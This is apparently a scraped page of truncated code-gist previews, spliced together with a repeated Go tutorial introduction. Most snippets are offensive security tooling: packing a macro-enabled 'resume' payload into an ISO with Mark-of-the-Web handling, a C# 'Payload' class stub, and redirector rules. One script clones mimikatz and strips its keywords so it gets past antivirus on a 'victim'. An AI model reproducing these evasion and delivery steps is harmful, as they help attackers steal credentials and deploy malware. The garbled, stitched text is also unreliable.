This is inspired by A half-hour to learn Rust and Zig in 30 minutes.
Your first Go program as a classical "Hello World" is pretty simple:
First we create a workspace for our project:
function Get-RdpLogonEvent | |
{ | |
[CmdletBinding()] | |
param( | |
[Int32] $Last = 10 | |
) | |
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{ | |
LogName='Security' | |
ProviderName='Microsoft-Windows-Security-Auditing' |
# Pack macro-enabled doc to ISO | |
py PackMyPayload.py Resume1337.xlsm test11.iso | |
# Apply MOTW on that ISO | |
Set-Content -Path test11.iso -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' | |
# Mount it | |
Mount-DiskImage -ImagePath test11.iso |
This is inspired by A half-hour to learn Rust and Zig in 30 minutes.
Your first Go program as a classical "Hello World" is pretty simple:
First we create a workspace for our project:
using System; | |
using System.IO; | |
using System.Net; | |
using System.Diagnostics; | |
using System.IO.Compression; | |
using System.Runtime.InteropServices; | |
public class Payload | |
{ | |
public Payload() |
Param([parameter(Mandatory=$true, | |
HelpMessage="Directory to search for .NET Assemblies in.")] | |
$Directory, | |
[parameter(Mandatory=$false, | |
HelpMessage="Whether or not to search recursively.")] | |
[switch]$Recurse = $false, | |
[parameter(Mandatory=$false, | |
HelpMessage="Whether or not to include DLLs in the search.")] | |
[switch]$DLLs = $false, | |
[parameter(Mandatory=$false, |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace BlockDllTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
# Save this file into something like /etc/apache2/redirect.rules. | |
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
# | |
# Include /etc/apache2/redirect.rules | |
# |
import winim | |
proc quit(value: DWORD) = | |
quit value.int | |
proc refreshDirectory(handle: var HANDLE) = | |
handle = FindFirstChangeNotification(".", false, | |
FILE_NOTIFY_CHANGE_FILE_NAME) | |
if handle == INVALID_HANDLE_VALUE: | |
quit GetLastError() |
# Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/windows | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |